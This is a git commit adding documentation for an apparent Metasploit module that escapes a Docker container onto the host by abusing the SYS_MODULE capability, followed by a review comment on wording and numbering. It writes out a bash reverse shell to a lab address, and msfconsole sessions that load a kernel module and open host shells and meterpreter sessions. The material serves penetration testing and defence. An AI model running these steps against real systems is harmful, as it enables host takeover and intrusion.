Added documentation for kernel escape

This commit is contained in:
RadioLogic
2023-11-07 21:50:09 -05:00
parent 2d683954de
commit cf0477138d
@@ -0,0 +1,106 @@
## Vulnerable Application
This module performs a container escape onto the host as the daemon user. It
takes advantage of the SYS_MODULE capability. If that exists and the linux
headers are available to compile on the target, then we can escape onto the host.
### Creating A Testing Environment
- Get a VM that you want to test on (or your own machine)
- Install Docker
- Run a listener (can be anything but well use an example of a bash reverse shell)
```msf
msf6 > use payload/cmd/unix/reverse_bash
msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0
lhost => 192.168.56.1
msf6 payload(cmd/unix/reverse_bash) > generate -f raw
bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
msf6 payload(cmd/unix/reverse_bash) > exploit -z
[*] Payload Handler Started as Job 0
msf6 payload(cmd/unix/reverse_bash) >
[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444
```
- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host. Container must be the same OS as host)
```bash
docker run --rm -it -p 4444:4444 --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
```
- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example
```bash
apt update && apt install -y gcc make kmod linux-headers-$(uname -r)
```
## Verification Steps
1. start msfconsole
2. get a session
1. `use exploit/linux/local/docker_privileged_container_kernel_escape`
2. `set SESSION [session]`
3. `set PAYLOAD [payload]`
6. `exploit`
## Options
### KernelModuleName
The name that the kernel module will be called in the system. The default if no name is set is "{rand(8)}"
### WritableContainerDir
A directory where we can write files inside the container (default is /tmp/.{rand(4)}). This is needed to drop the payload into the container.
### ReloadKernelModule
Rebuilds and reloads kernel module if its already loaded in case of repeat runs.
## Scenarios
### Container Escape from debian linux with reverse bash
```msf
msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)"
[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126)
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1
session => 1
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444
[*] [2023.11.07-21:42:42] Creating files
[*] [2023.11.07-21:42:43] Making kernel module
[+] [2023.11.07-21:42:43] Kernel module compiled successfully
[*] [2023.11.07-21:42:43] Loading kernel module
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500
[*] This is CredCollect, I have the conn!
```
### Container Escape from arch linux with meterpreter
```msf
msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers"
[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106)
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2
session => 2
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0
lhost => vboxnet0
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444
[*] [2023.11.07-21:48:41] Creating files
[*] [2023.11.07-21:48:43] Making kernel module
[+] [2023.11.07-21:48:44] Kernel module compiled successfully
[*] [2023.11.07-21:48:44] Loading kernel module
[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500
[*] This is CredCollect, I have the conn!
[!] [2023.11.07-21:48:45] Attempting to delete working directory /tmp/.IvLx
[*] Session 4 created in the background.
```
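Review bot: the Verification Steps list is mis-numbered (1, 2, 1, 2, 3, 6) and should run 1 through 6, and the "Create a privileged container" bullet contradicts the command under it, which grants only `--cap-add SYS_MODULE` rather than `--privileged` and connects back to the reverse_bash listener started above, not the bind shell the parenthetical mentions. Suggest rewording the bullet to "Create a container with the SYS_MODULE capability (the container must run the same OS as the host so that `linux-headers-$(uname -r)` resolves to the host kernel's headers)" and dropping the port-forwarding remark unless a bind payload is actually shown. The Vulnerable Application paragraph would also read better if it stated plainly that the module requires a container started with that extra capability plus a working toolchain and matching kernel headers inside it, since those are exactly the conditions the `check` output in both scenarios reports on. Minor wording: "well use" should be "we'll use" in the listener bullet, and "if its already loaded" should be "if it's already loaded" under ReloadKernelModule.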